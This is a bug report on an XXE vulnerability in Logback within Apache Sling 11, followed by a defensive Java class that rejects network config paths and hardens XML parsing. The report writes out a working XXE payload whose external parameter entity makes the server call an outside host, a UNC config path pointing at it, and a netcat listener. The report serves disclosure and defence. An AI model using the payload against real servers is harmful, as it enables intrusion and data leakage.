Details
- Type: Bug
- Resolution: Fixed
- Priority: Critical
- Environment: I tested Apache Sling latest version 11 integrating Logback, running on a Windows system.
Description
Hi, I found an XXE vulnerability in Logback when testing Apache Sling latest version 11 integrating Logback.
First I logged in to Sling as an admin.
The vulnerable URL is http://127.0.0.1:8080/system/console/configMgr/org.apache.sling.commons.log.LogManager.
In the "Logback Config File" field, I entered "\\192.168.0.102\c$\xxe.xml" as shown below.
The content of xxe.xml in the c:\ directory on the server 192.168.0.102 is:
<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "http://192.168.0.102:8090/sling">%sp;]>
After clicking "save", the netcat instance running on the server 192.168.0.102 and listening on port 8090 receives the request as shown below.
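As an added defensive check (example code written here, not code from the Sling or Logback projects): a Java class that refuses a UNC or URL-style config-file location and parses the Logback config with a hardened DocumentBuilderFactory, so a DOCTYPE like the one in the report is rejected before any external entity is fetched. The class and method names are assumed; the sample payload is the report's XML with its host kept as reported.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class SafeLogbackConfigCheck {

    // Constructed sample: the XML from the report (parameter entity pointing at a remote URL).
    static final String REPORTED_PAYLOAD =
        "<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY % sp SYSTEM "
        + "\"http://192.168.0.102:8090/sling\">%sp;]>";

    /** Accept only plain local paths: reject UNC (\\host\share) and scheme://... locations. */
    static boolean isLocalPath(String location) {
        String s = location.trim();
        if (s.startsWith("\\\\") || s.startsWith("//")) return false;  // UNC / network path
        if (s.matches("(?i)^[a-z][a-z0-9+.-]*://.*")) return false;      // http://, file://, ...
        return true;
    }

    /** Parser hardened against XXE: DOCTYPE forbidden, no external entities, no external DTD. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** True only if the XML parses under the hardened builder; any DOCTYPE causes a rejection. */
    static boolean parsesSafely(String xml) {
        try {
            hardenedBuilder().parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXException | IOException | ParserConfigurationException e) {
            return false;  // rejected before the parser contacts any SYSTEM identifier
        }
    }

    public static void main(String[] args) {
        System.out.println("UNC path accepted: " + isLocalPath("\\\\192.168.0.102\\c$\\xxe.xml"));
        System.out.println("reported payload accepted: " + parsesSafely(REPORTED_PAYLOAD));
        System.out.println("plain config accepted: " + parsesSafely("<configuration/>"));
    }
}
```

Both checks are needed: the path rule stops the config from being read off a remote share at all, and the parser settings stop entity resolution even if a DOCTYPE reaches the parser by another route.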